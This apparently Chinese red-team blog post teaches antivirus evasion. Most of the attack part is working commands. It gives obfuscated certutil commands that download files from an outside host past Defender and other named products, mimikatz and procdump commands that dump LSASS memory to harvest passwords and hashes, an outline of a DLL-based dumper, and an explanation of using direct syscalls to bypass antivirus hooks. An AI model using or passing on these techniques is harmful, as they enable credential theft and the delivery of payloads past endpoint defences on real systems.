免杀对抗-安全工具篇&动态绕过&DumpLsass凭据&Certutil下载&变异替换&打乱源头特征&SysCALL调用

Ethan医生2个月前工具76

 动态拦截-certutil绕过-源头特征混淆命令

 动态拦截-dumplsass绕过-源头特征混淆文件


 

#动态拦截-certutil绕过-源头特征混淆命令

Certutil是作为证书服务的一部分安装的命令行工具。

使用Certutil显示证书颁发机构 (CA) 配置信息、配置证书服务、备份和还原 CA 组件。Certutil命令中有个参数urlcache可以用于远程下载,直接运行指令会windows defender和大部分杀软查杀。一般解决无图像化下载上传文件操作等。

 

DF:

certutil -url""""cache -split -f http://192.168.1.4:81/1.txt

cert^u^t^il -url""""cache -sp""""lit -f http://192.168.1.4:81/1.txt

copy c:\windows\system32\certutil.exe c.exe

c.exe -url""""ca^c^he -spl""""it -f http://192.168.xx.xx:7070/test.txt

 

火绒:

copy c:\windows\system32\certutil.exe a.exe

a.exe -urlcache -split -f http://192.168.1.4:81/1.txt

 

X60:

打乱certutil文件属性,资源修改

123.exe -url""""cache -split -f http://192.168.1.4:81/1.txt

 

#动态拦截-dumplsass绕过-源头特征混淆文件

Dumplsass在内网安全测试中,成功导出获取口令或HASH起到了关键作用,各大杀毒也是对此进行各种拦截,如不能解决拦截将大大降低后续测试成功率。

 

0、Mimikatz离线

sekurlsa::minidump xx.log

sekurlsa::logonpasswords full

 

1、加载DLL

rundll32 dll.dll dllmain

具体代码实现思路:

-提升访问lsass.exe进程内存的权限

-获取lsass.exe进程的pid值

-创建文件来存储lsass.exe进程内存里面的内容

 

2、变异+加载Dll

rundll dll.dll dllmain

 

DF测试中发现生成但被杀(文件混淆下)

CallBackDump to

dumpXor xx.log xx.bin

https://github.com/seventeenman/CallBackDump

 

3、变异+白加黑DLL+SSP(X60)

参考:https://forum.butian.net/share/2434

 

4、一些冷门的项目

参考:https://mp.weixin.qq.com/s/LEYdM8Ulo93mYR4bydzxfw

procdump -accepteula -ma lsass.exe mm.dmp

https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

 图片


Intel的CPU将特权级别分为4个级别--从R0到R3,R0是系统核心态,在核心态运行,拥有最高权限;R1和R2运行的是设备驱动程序;R3是用户代码态,在用户态下运行,拥有最低权限,每一层支持访问本层以及权限更低层的数据。

#Syscall技术基础

参考:https://mp.weixin.qq.com/s/CGmBhAS0vWo9r5LJwLAEzg

 

#Syscall Bypass 杀软原理

如下图所示,当用户在运行Malware.exe时,系统会调用一些windows API,有些杀软就会hook系统所调用的API,但是最终我们调用的还是Ntxxx这个种函数,此时有些Ntxxx函数并没有被杀软 hook,因此可以Bypass 杀软。


相关文章

nmap与arp-scan功能对比分析

nmap与arp-scan功能对比分析

nmap 和 arp-scan 都是网络扫描工具,但它们在功能、原理和使用场景上有显著区别。以下是主要差异:1. 协议层不同arp-scan:工作在数据链路层(...

免杀对抗-安全工具篇&新型Go架构&C2-Sliver多平台&上线模式&红队集成研究&免杀方向

免杀对抗-安全工具篇&新型Go架构&C2-Sliver多平台&上线模式&红队集成研究&免杀方向

#安全工具-新型C2-Sliver使用详解Sliver C2 是一个开源的跨平台红队框架,采用Go开发,目前特征相对于CS更少!集成了MSF命令行运行模式,又结合了CS的优势特点,合并提供了两种操作模...

免杀对抗-安全工具篇&魔改二开CS&消除流量特征&Profile请求&个性主题&反编译去暗桩

免杀对抗-安全工具篇&魔改二开CS&消除流量特征&Profile请求&个性主题&反编译去暗桩

➢ 安全工具-配置修改-CS流量特征➢ 安全工具-魔改二开-CS个性化打造➢ 安全工具-魔改二开-CS免杀流量对抗#安全工具-配置修改-CS流量特征消除特征点:默认端口,...

APP隐私合规

APP隐私合规

#隐私合规-判断规则&检测项目对象:APP 小程序等具体:后续APP安全课程资料参考:https://mp.weixin.qq.com/s/SfCIx0mNxn_PDfXP_5SfOQ检测项目...

免杀对抗-安全工具篇&Go魔改二开&Fscan扫描&FRP代理&特征消除&新增拓展&打乱HASH

➢ 安全工具-Goland-FRP魔改二开-特征消除➢ 安全工具-Goland-FScan魔改二开-特征消除   (主要使用在前期内网信息打点 fscan -h...

【免杀】-魔改冰蝎behinder

【免杀】-魔改冰蝎behinder

【免杀】-魔改冰蝎冰蝎特征冰蝎有两个特征,其中有两个强特征分别是 两个固定Accept和数据包一大堆加密冰蝎默认的加解密方式六种解决1:绕过识别(魔改打乱指纹信息)解决2:绕过查杀(新增加密...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。